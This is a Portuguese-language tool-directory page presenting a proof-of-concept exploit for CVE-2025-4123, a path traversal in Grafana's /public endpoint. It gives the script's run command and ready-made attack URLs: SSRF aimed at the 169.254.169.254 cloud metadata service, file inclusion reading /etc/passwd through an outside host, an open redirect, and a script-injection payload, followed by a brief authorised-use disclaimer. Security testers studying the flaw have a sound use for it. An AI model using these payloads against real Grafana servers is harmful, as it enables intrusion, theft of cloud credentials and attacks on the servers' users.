Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-4123-Exploit-Tool-Grafana- — CVE-2025-4123 - Ferramenta Grafana | Kitploit
Ferramentas/GitHubGitHub/ynsmroztas/cve-2025-4123-exploit-tool-grafana-
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoRed Teaming
GitHubynsmroztas/cve-2025-4123-exploit-tool-grafana-

CVE-2025-4123-Exploit-Tool-Grafana-

CVE-2025-4123 - Ferramenta Grafana

Ver Repositório
326há 1 anoRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-4123 - Exploit de Path Traversal no Grafana

Desenvolvido por mitsec

Esta é uma ferramenta de exploração de prova de conceito (PoC) para o CVE-2025-4123, uma vulnerabilidade crítica de path traversal no endpoint /public do Grafana. A exploração permite:

  • ✅ Server-Side Request Forgery (SSRF)
  • ✅ Local File Inclusion (LFI)
  • ✅ Open Redirect
  • ✅ Cross-Site Scripting (XSS)

🔥 Afetados

Instâncias do Grafana com o endpoint /public/ que tratam incorretamente caminhos codificados como:

root@kitploit:~
/public/..%2F%5coast.pro%2F%3f%2F..%2F..

🚀 Uso

root@kitploit:~
python3 cve_2025_4123_exploit_mitsec_final.py

Em seguida, selecione o modo desejado:

  1. SSRF - Serviços internos como 169.254.169.254
  • LFI - Ler arquivos como /etc/passwd
  • Open Redirect - Redirecionar para domínios externos
  • XSS - Injeção de JavaScript no caminho público

  • 🧪 Exemplo

    root@kitploit:~
    [*] SSRF URL: http://127.0.0.1:3000/public/..%2F%5C169.254.169.254/latest/meta-data/%2F%3f%2F..%2F..
    [*] LFI URL:  http://127.0.0.1:3000/public/..%2F%5coast.pro%2F%3f%2F..%2F..%2F..%2Fetc%2Fpasswd
    [*] XSS URL:  http://127.0.0.1:3000/public/%3Cscript%3Ealert('mitsec')%3C%2Fscript%3E
    

    📄 Aviso Legal

    Este código é fornecido apenas para fins educacionais e de teste autorizado. O uso não autorizado contra sistemas sem consentimento é ilegal.


    ✍️ Autor

    • mitsec
    Baixar ferramenta